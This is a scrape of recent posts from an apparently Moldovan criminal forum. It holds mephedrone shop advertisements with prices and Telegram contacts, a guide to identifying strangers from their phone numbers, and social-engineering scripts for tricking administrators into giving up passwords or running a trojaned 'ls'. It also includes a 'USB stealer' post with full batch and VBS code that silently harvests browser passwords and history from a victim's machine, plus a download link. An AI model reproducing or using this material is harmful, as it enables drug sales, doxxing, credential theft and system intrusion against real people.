Последние сообщения

#81
Монтана в Кишинёве Приветствуем тебя 😯
Так как я не Михай Эминеску🤭 и не Ион Крянгэ 😁  красиво не могу рассказать могу по-простому всё сказать (город Кишинёв 9 лет в теме)  не знаю что может меня удивить всегда хочу что-то новое чтобы было топ 😈🤫 Может будешь ты Монтана я не сомневаюсь верю💨 поэтому хочу попасть в том списке где после чего получу свой тест буду обязан быть искренним и распространять в вид (описании) (фото) (видно)💬 гарантирую что буду рассказать правду и только правда🗣  а  твоём продукте🗯💣 Желаю тебе успехов и огромный доход С уважением 🤠есть🤠
#83
Цитата: MontanaShop от Июль 11, 2025, 05:30  ✨ 🔥 Набор тестеров | 5 проб «mph» | Кишинёв 🔥 ✨

✅ Ищем надёжных ребят для теста топового товара!
📦 Бесплатно выдаём 5 проб на проверку качества.
📍 Город: Кишинёв

💬 Оставляй заявку в теме или пиши в ЛС.
⏳ Кол-во мест ограничено!

⚡ Только реальные отзывы и честный фидбек! ⚡
 
я хочу
#84
Здравствуйте, запишусь на пробу, Кишинев
Опыт трип репортов на площадке имеется!)
#86

✨ 🔥 Набор тестеров | 5 проб «mph» | Кишинёв 🔥 ✨

✅ Ищем надёжных ребят для теста топового товара!
📦 Бесплатно выдаём 5 проб на проверку качества.
📍 Город: Кишинёв

💬 Оставляй заявку в теме или пиши в ЛС.
⏳ Кол-во мест ограничено!

⚡ Только реальные отзывы и честный фидбек! ⚡

Список тестеров и трип репорты будут опубликованы тут 👉🏻https://blackmoldova.cc/index.php?topic=283.0

 
#87
😎 Приветствуем в магазине МОНТАНА! 🖤✨
Только топовый меф, быстрый сервис и надёжность без лишних слов! 🚀

💥 ПРАЙС:
🥶 0.5г — 17$
🤯 1г — 27$
💀 2г — 49$
👑 3г  — 68$


📲 Контакты для заказа:
💬 Чат: t.me/+YoM9-TvdWGBiNTU6
📣 Канал: https://t.me/montanasotz
🤖 Бот (авто‑шоп): @MONTANA000bot
👤 Оператор: @montanakishenev

⚡ Работаем 24/7 | Быстро | Качественно | Конфиденциально ⚡
#88

Из-за специфики моей деятельности мне часто нужно знать кому принадлежит тот или иной номер. В моем случае платить бабки пробив сервисам дорого и нецелесообразно, поэтому делюсь своим небольшим гайдом, который работает в 70% случаев и я могу идентифицировать человека по номеру телефона.

Для кого-то этот гайд очевиден, но возможно есть те, кто до этого не додумался.
Гайд для тех, кто не умеет пользоваться поиском по соц. сетям.

Для этого нам нужен телефон на андроиде/ios. А также аккаунты в instagram, whatsapp, viber и telegram. Итак, приступим:

1) Добавляем интересующий нас номер в контакты.

2) Первым делом: Instagram->Ваш профиль->Параметры->Для подписок->Контакты
Если к номеру привязан аккаунт в инстаграме, то этот аккаунт отобразится в этом списке. Если аккаунт привязан, то как минимум у нас есть фотография, которая стоит на аватаре. Как максимум: имя/фамилия, ссылка на вк, фотографии, прочие ссылки и т.д.

Если не привязан, то:
3) WhatsApp (Viber/Telegram)->Контакты->Нужный номер->Профиль. Имеем фотографию, сохраняем ее и идем в поиск по фотографиям google, findface и прочее.
Если найден аккаунт в Instagram, но данные там фейковые, то возможно имя профиля совпадает с профилем в вк, или оно засвечено где-нибудь, то подумайте и ищите, скорее всего что-нибудь да найдете.
Если найден аккаунт в Telegram, то там часто пользователи указывают username, который опять же где-нибудь засвечен.

Если номер никуда не привязан, то идем:
4) Telegram и ищем там AVInfoBot (штука интересная, имеет ряд возможностей, которые я расписывать не буду, посмотрите сами). ****аем номер, получаем инфу. Иногда через него мне удавалось установить ФИО полностью и фамилию/имя (далее поиск в вк и т.д). А также информацию о том, что он продает/продавал.

5) Ресурс phonenumber.to. ****аем туда номер и ищем. Если искали через AVInfoBot, то можно этот шаг пропустить, так как он ищет номера и через этот ресурс в том числе.

Если ничего не нашли:
6) Поиск в google/яндекс по запросу: 9993334455 | "9993334455" | "(999)3334455" | "89993334455" | "8 999 3334455" | "8(999)3334455" | "8 999 333 44 55" | "8(999)333-44-55" | "79993334455" | "7 999 3334455" | "7(999)3334455" | "7 999 333 44 55" | "7(999)333-44-55

На этом поиск я заканчиваю.
Было бы интересно узнать как вы пробиваете человека по номеру телефона
#89



Наверняка все в детстве баловались с телефонами. Ну кто не знает таких шуток, как: "Алло, это зоопарк?" - "Нет". - "А почему обезьяна у телефона?". Совершенно безобидный пример издевательства над людьми. А вот еще один подобный пример, но с элементами СИ:

Шутник: Алло! Вас беспокоят с телефонной станции. Измерьте, пожалуйста, длину шнура от трубки к телефону.
Жертва: Метр.
Ш.: Хорошо, для того, чтобы повеситься, хватит.
Следующий звонок.
Ш.: Алло! Это милиция. Вам сейчас хулиганы не звонили?
Ж.: Да, да! Звонили! Разберитесь с ними, пожалуйста!
Ш.: Про трубку и провод спрашивали?
Ж.: Да!
Ш.: И он у вас метр?
Ж.: Да!
Ш.: А почему до сих пор не висим?

Это было лирическое отступление на тему того, как методы СИ используются детьми на бессознательном уровне, в качестве шутки. Рассмотрим простейший пример СИ для проникновения в систему.

Звонок администратору системы.
Взломщик: Здравствуйте, вы администратор?
Администратор: Да.
В.: Я понимаю, что вы ужасно заняты, извините, что отрываю вас от дел, по я не могу войти в сеть.
А.: (Про себя: ЕПРСТ!!! Поработать не дают!) А что компьютер говорит по этому поводу?
В.: Как это - "говорит"???
А.: (Ха!) Ну, что там написано?
В.: Написано "вронг пассворд".
А.: (Ну-ну, еще бы...) А-а-а-а... А вы пароль правильно набираете?
В.: Не знаю, я его не совсем помню.
А.: Какое имя пользователя?
В.: anatoly.
А.: Ладно, ставлю вам пароль... мммм... art25. Запомнили? (Если опять не войдет - убью!)
В.: Постараюсь... Спасибо. (Вот дурак-то!)
Конец разговора. Все!

На самом деле это упрощение ситуации, но в некоторых случаях такое может сработать. Какие ошибки допустил администратор? С его точки зрения - никаких. В подобных случаях редко спрашиваются имя, фамилия, должность звонящего, особенно если звонит девушка с приятным голосом (для этого и используются преобразователи голоса). Администраторы часто сталкиваются с забывчивостью пользователей, особенно если сотрудники редко "входят" в систему. В таких случаях ответственное лицо старается побыстрее положить трубку, и ему хватает того, что пользователь знает свое имя входа в систему. Однако в этом случае взломщик уже знал некоторые сведения о своей цели. Рассмотрим пример с первоначальными нулевыми знаниями.
Выберем цель по телефонной книге - организацию, где есть телефон секретаря.
Звоним секретарю и узнаем имя персоны, с которой можно проконсультироваться по поводу некоторых проблем с работой системы.
Звоним любому другому человеку, чей номер телефона имеется в книге, предполагая, что он имеет доступ к системе.
Представляемся (разумеется, вымышленным именем) как помощник той персоны, имя которой мы узнали из первого звонка. Говорим, что в связи с перестановкой системы администратор дал задание поменять пароли всем пользователям.
Узнаем имя входа, прежний пароль, говорим новый пароль. Все!
В том случае, если доступ к системе происходит посредством телефонных линий, звоним секретарю, говорим, что не получается дозвониться до системы, и просим назвать правильный номер телефона. В принципе этот пример немногим отличается от предыдущего, но есть большая вероятность получения доступа в систему вследствие оперирования в разговоре конкретными именами и должностями.

После того как взломщик получает доступ к системе в виде простого пользователя, ему не составляет большого труда получить полное право на нее с помощью тех способов, которые описаны в главе 9. Но можно и дальше развить СИ для получения привилегий администратора. Вот пример на UNIX-системе.

Пусть каким-либо образом взломщик узнал, что у администраторе в переменную окружения PATH включена "." (это значит выполнение программ из текущего каталога, многие так делают для удобства работы)

Звонок администратору.
Хакер: Здравствуйте, вы администратор?
Администратор: Да.
X.: Извините, что отвлекаю. Не могли бы вы мне помочь?
А.: (Ну что еще ему надо?) Да, конечно.
X.: Я не могу в своем каталоге выполнить команду ls.
А.: (Как будто ему это надо!) В каком каталоге?
X.: /home/anatoly.
А.: (Вот ведь глупый юзер!) Сейчас посмотрю. (Заходит в этот каталог и набирает команду ls, которая успешно выполняется и показывает наличие нормальных прав на каталог.)
А.: Все у вас должно работать!
X.: Хммм... Подождите... О! А теперь работает... Странно...
А.: (Рррррр!!!) Да? Хорошо!
X.: Спасибо огромное. Еще раз извиняюсь, что помешал.
А.: (Ну наконец!) Да не за что. (Отстань, противный!) До свидания.
Конец разговора.

Заметили криминал? Вроде бы ничего особенного. Даже с точки зрения опытного администратора. Что же произошло на самом деле? В каталоге /home/anatoly среди множества других файлов лежал измененный вариант программы ls. Как раз его-то администратор и запустил. Все дело в том, что при выполнении этого файла у запускающего (администратора) имелись все права на систему, и, соответственно, все программы, которые он запускает, могут делать с системой практически все, что угодно. Что было в этом файле, кроме возможности показывать список файлов в каталоге, теперь только взломщику и известно.

Разумеется, эти случаи годятся для организации со средним уровнем защиты. В банках или военных учреждениях наверняка так просто ничего не получится. Там могут спросить имя звонящего, его адрес, номер паспорта или предложат оставить номер телефона для последующего уведомления о смене пароля (для этого и нужна возможность использовать чужую линию, чего позволяют добиться офисные мини-АТС, которыми можно оперировать с удаленного терминала или из сети Internet). В таком случае взломщики обычно заранее собирают информацию о потенциальных жертвах. Как это делается? Пожалуйста, еще один пример из телефонных шуток.

Звонок на совершенно незнакомый номер.
Взломщик: Алло, извините, вас беспокоят с телефонной станции. Это номер такой-то?
Жертва: Да.
В.: У нас идет перерегистрация абонентов, не могли бы вы сообщить, на кого у вас зарегистрирован телефон? Имя, фамилию и отчество, пожалуйста.
Ж.: (Говорит информацию.)
В.: Спасибо! Так... секундочку... Хорошо, ничего не изменилось. А место работы?
Ж.: (С некоторым сомнением называет, а если человек очень подозрительный, то спрашивает, зачем.)
В.: Это сведения для новой телефонной книги. По вашему желанию можем внести не одно имя, а всех, кого можно найти по этому телефону.
Ж.: (Тут с радостью называются имена всех членов семьи с их положением в ней, хотя это и не требовалось.)

Информации уже достаточно для попытки взлома. Таким же образом становятся известными номера паспортов и т. д. После такого разговора можно звонить сотрудникам хозяина телефона от имени его родственников и получать дальнейшую информацию.

Еще один пример.
Взломщик: Алло, это приемная?
Жертва: Да.
В.: Это администрация сети. Мы сейчас меняли сетевую систему защиты. Необходимо проверить, все ли у вас нормально работает. Как вы обычно регистрируетесь в системе?
Ж.: Ввожу свои имя и пароль.
В.: Хорошо... Так... (Пауза) Какое имя?
Ж.: anna.
В.: Анна... (Пауза) Так... какой у вас раньше был пароль?
Ж.: ienb48.
В.: Та-а-а-ак... Хорошо. Попробуйте сейчас перерегистрироваться.
Ж.: (Пауза) Все нормально. Работает.
В.: Отлично. Спасибо!

Разумеется, в маленьких организациях, где все знают администратора, это не сработает, зато в больших есть пространство для применения своих способностей.

Вот как использовали СИ такие люди, как Кевин Митник и Роско: "И Роско, и Кевин гордились своим умением общаться с людьми. На их взгляд, в любом разговоре можно было подчинить себе собеседника, если говорить авторитетным тоном знатока, даже если в этой области ты ничего не смыслишь. Время от времени они названивали в отдел дистанционной связи какой-нибудь компании и недовольным начальственным голосом требовали объяснить, почему тот или иной номер АТС не удается набрать из города. И напуганный оператор объяснял им, как набрать интересующий их номер.

Обычно в таких случаях Кевин предпочитал импровизировать, полагаясь на свою интуицию, а Роско возвел свое умение разговаривать с людьми чуть ли не в ранг искусства. Он вел специальную записную книжку, куда вписывал имена и должности телефонисток и операторов разных фирм и их начальников. Там же он помечал, новички они или опытные работники, насколько хорошо информированы, расположены к разговорам или нет. Заносил он в книжку и сведения, так сказать, личного характера, добытые в течение долгих часов разговоров по телефону: увлечения, имена детей, любимые виды спорта и места, где они любят бывать в отпуске и по выходным" [5].

В некоторых источниках предлагается ходить с видеокамерой, изображая репортера, и почаще наводить ее на клавиатуру пользователей. Здесь сработает предположение, что людям наверняка захочется увидеть себя по телевизору. Можно даже попросить человека сделать вид, что он только что пришел на работу и садится за компьютер... Ну и, разумеется, попросить включить его и начать работу.
#90
Безопасность в интернете / Крадем все пассы или USB Steal...
Последний ответ от bratva - Июль 07, 2025, 11:29
Крадем все пассы или USB Stealer на коленке :D


Всем привет друзья! В этой статье я расскажу вам как с помощью небольшой социальной инженерии и стиллера, спиздить все пассы с браузеров а так же историю. Прошу прощения.. если весь софт и сам способ - БАЯН. Я не крал эту статью. НАШЕЛ - СОФТ, написал батник, и скрипт VBS. В итоге получился вот такой вот стиллер. Ниже я прикреплю ссылку на скачивание архива.. и на сканер VT. Софт старенький так что даже AVAST его видит как вирус.. только потому что софт просматривает куки браузера. Качать.. запускать.. тестить.. это всё на ваше усмотрение! Ну чтож.. начнём)

Пароли крадутся с браузеров Chrome, Opera, Firefox, IE. Так же пассы от роутера.. но это не точно я не проверял!

- Пройдемся по содержанию архива.

В корневой папке у нас есть 2 файла это usbs.bat и usbs.vbs. USBS.BAT - Это основной исполняющий файл.
Вот его код:

[USER=98981]@Echo[/USER] off

FOR %%A IN (%Date:/=%) DO SET Today=%%A
for /l %%a in (1,1,1) do if "!Today:~-1!"==" " set Today=!Today:~0,-1!
SET dynpathname=%TODAY%_%COMPUTERNAME%_%USERNAME%.txt

start usbs/WebBrowserPassView.exe /stext usbs/log/webbrowserpassview_%DYNPATHNAME%
start usbs/operapassview.exe /stext usbs/log/operapassview_%DYNPATHNAME%
start usbs/routerpassview.exe /stext usbs/log/routerpassview_%DYNPATHNAME%
start usbs/operapassview.exe /stext usbs/log/operapassview_%DYNPATHNAME%
start usbs/iepv.exe /stext usbs/log/iepv_%DYNPATHNAME%
start usbs/chromehistoryview.exe /stext usbs/log/chromehistoryview_%DYNPATHNAME%

ping -n 5 127.0.0.1 > nul

exit

Файл USBS.VBS - Является исполняемым.. он нужен для беспалевного запуска батника.
Вот его код:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "usbs.bat" & Chr(34), 0
Set WshShell = Nothing


В папочке USBS - у нас лежит весь исполняемый софт. И самое главное подпапка LOG - вот как раз в этой самой папочке и сохраняются все куки и история жертвы.

По моему.. всё.. нечего не забыл.

- Хочу сразу отметить то что кражу лучше производить следующим образом.
1. Скидываем все файлы из архива на флэшку.
2. Скрываем все файлы с помощью меню "Свойства".
3. И тут правило 5 секунд, пока жертва нихуя не видит, через адресную строку пишем следующее.. "БУКВА_USB:/usbs.vbs".

НЕ СТОИТ ЗАПУСКАТЬ БАТНИК, ТАК КАК ВЫЛЕЗЕТ КОНСОЛЬ!

Готово! Теперь все файлы куки и история хранятся в папочке USBS/LOG

VT: https://www.virustotal.com/ru/file/...87814a7935a89585db22b24c/analysis/1516688620/
СКАЧАТЬ: https://mega.nz/#!8K5XiD4D!YSxo-MY8KH0TU1dnw7bvsF3fgraoadu3Jr7zBrBvhgY

Пароль на архив: lolzteam.org
Powered by SMFPacks Reactions Mod